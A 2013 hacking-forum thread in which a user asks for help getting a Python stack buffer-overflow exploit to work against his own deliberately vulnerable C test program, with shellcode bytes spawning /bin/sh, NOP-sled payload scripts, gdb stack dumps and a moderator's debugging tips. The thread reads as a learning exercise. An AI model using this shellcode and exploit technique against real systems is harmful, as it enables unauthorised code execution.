Exploiting Buffer Overflows Using Python

For the discussion of Perl, Python, Ruby, and PHP and other interpreted languages.

Exploiting Buffer Overflows Using Python

Post by Th3_M4d_H4tt3r on Sat Jun 22, 2013 2:40 am
([msg=76214]see Exploiting Buffer Overflows Using Python[/msg])

Alright, I need a little help with this one; here is my test program (C):
Code: Select all
void main(int argc, char *argv[]) {
  char buffer[100];

  if (argc > 1)
    strcpy(buffer,argv[1]);
}

I enabled stack execution (gcc fno-stack-protector)
I found my memory addres (bffff500)
here is my exploit program:
Code: Select all
buffsize = 104   #the buffer size after the return address is overwritten

shellcode ="\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x78\x46\x08\x30\x49\x1a\x92\x1a\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68"

ret = "\xbf\xff\xf5\x00" #bffff500

nop = "\x90"

buffsize = buffsize - len(shellcode)+4

exploit = nop * buffsize+shellcode+ret

print exploit

I used it like this:
./test `python exploit.py`

but; when I execute it i get no output, what am I doing wrong?
oh BTW, the shellcode is from http://shell-storm.org/shellcode/files/ ... de-698.php

off-topic: my cat is snoring right now!
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)


Re: Exploiting Buffer Overflows Using Python

Post by centip3de on Sat Jun 22, 2013 12:55 pm
([msg=76217]see Re: Exploiting Buffer Overflows Using Python[/msg])

Buffer overflows are fickle mistresses that require some fine tuning and testing to get just right. I'd recommend you test this through GDB first (loading the program, then doing: python -c 'print "A"*104', making sure it overwrites the EIP, etc.). If that's all good, and you get it to work, then make a script, not before.

Also, your C program should always be "int main(...)", and your main function should always return 0!
Programming today is a race between software engineers striving to build bigger and better idiot-proof programs, and the Universe trying to produce bigger and better idiots. So far, the Universe is winning. -Rick Cook
User avatar
centip3de
Moderator
Moderator
 
Posts: 1426
Joined: Fri Aug 20, 2010 5:46 pm
Blog: View Blog (0)


Re: Exploiting Buffer Overflows Using Python

Post by Th3_M4d_H4tt3r on Sat Jun 22, 2013 2:08 pm
([msg=76219]see Re: Exploiting Buffer Overflows Using Python[/msg])

I have overwritten the return address but I keep getting a SIGILL

Illegal instruction (core dumped)

here is my new exploit code (ubuntu):
Code: Select all
buffsize = 100   #the buffer size

shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

ret = '\xbf\xff\xf5\x00' #bffff500

nop = '\x90'

buffsize = buffsize - len(shellcode)+6

exploit = nop * buffsize+shellcode+ret*2

print exploit


here is my stack trace:
(gdb) x/99ga $esp
0xbffff2e0: 0x2 0xbffff380
0xbffff2f0: 0x0 0xbffff380
0xbffff300: 0x804821c 0x0
0xbffff310: 0x0 0x93696d7c
0xbffff320: 0x0 0x2
0xbffff330: 0x0 0xb7e383e9 <__libc_start_main+9>
0xbffff340: 0x2 0x0
0xbffff350: 0x80483e4 <main> 0xbffff374
0xbffff360: 0x8048480 <__libc_csu_fini> 0xbffff36c
0xbffff370: 0x2 0xbffff4f7
0xbffff380: 0xbffff568 0xbffff5a6
0xbffff390: 0xbffff5c1 0xbffff624
0xbffff3a0: 0xbffff65e 0xbffffbb9
0xbffff3b0: 0xbffffc13 0xbffffcaf
0xbffff3c0: 0xbffffceb 0xbffffd6b
0xbffff3d0: 0xbffffd8f 0xbffffdb7
0xbffff3e0: 0xbffffe0f 0xbffffe2d
0xbffff3f0: 0xbffffe4b 0xbffffe8a
0xbffff400: 0xbfffff3e 0xbfffff69
0xbffff410: 0xbfffffa5 0x0
0xbffff420: 0xb7fdd414 <__kernel_vsyscall> 0xb7fdd000
0xbffff430: 0xbfebfbff 0x1000
0xbffff440: 0x64 0x8048034
0xbffff450: 0x20 0x9
0xbffff460: 0xb7fde000 0x0
0xbffff470: 0x8048330 <_start> 0x3e8
0xbffff480: 0x3e8 0x3e8
0xbffff490: 0x3e8 0x0
0xbffff4a0: 0xbffff4cb 0xbfffffe6
---Type <return> to continue, or q <return> to quit---
0xbffff4b0: 0xbffff4db 0x0
0xbffff4c0: 0x0 0x38000000
0xbffff4d0: 0x3609aa30 0x69fba7b2
0xbffff4e0: 0x6f682f00 0x682d6461
0xbffff4f0: 0x65742f72 0x90909090
0xbffff500: 0x90909090 0x90909090
0xbffff510: 0x90909090 0x90909090
0xbffff520: 0x90909090 0x90909090
0xbffff530: 0x90909090 0x90909090
0xbffff540: 0x90909090 0x90909090
0xbffff550: 0x732f2f68 0xe3896e69
0xbffff560: 0x80cd0bb0 0x5f485353
0xbffff570: 0x49505f54 0x47003831
0xbffff580: 0x544e4547 0x742f3d4f
0xbffff590: 0x69727965 0x5a616d78
0xbffff5a0: 0x3a303a67 0x3d4c4c45
0xbffff5b0: 0x7361622f 0x783d4d52
0xbffff5c0: 0x47445800 0x4e4f4953
0xbffff5d0: 0x3d45494b 0x31393834
0xbffff5e0: 0x63626336 0x39373036
0xbffff5f0: 0x33313030


Any ideas?

-- Mon Jun 24, 2013 4:19 pm --

Alright, I fixed up my code a little, I am much; much closer!

I am having problems with overwriting the return address, it is off by on byte.
here is my exploit code (python):
Code: Select all
buffsize=100

shellcode="\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80"

buffsize=buffsize - len(shellcode)+12

ret="\x00\xf5\xff\xbf"      #0xbffff500

print "\x90"*buffsize+shellcode+ret


but when I run the exploit on my vulnerable program the return address is:
0x00bffff5
but it should be:
0xbffff500

how can I acheive this?
Tip me if I helped you!
BTC Address: 15wu8gxFAemZH3jC4km3Z8gMYtKHLxpnEv
User avatar
Th3_M4d_H4tt3r
Experienced User
Experienced User
 
Posts: 54
Joined: Tue Jun 18, 2013 8:25 am
Blog: View Blog (0)



Return to Interpreted Languages

Who is online

Users browsing this forum: No registered users and 0 guests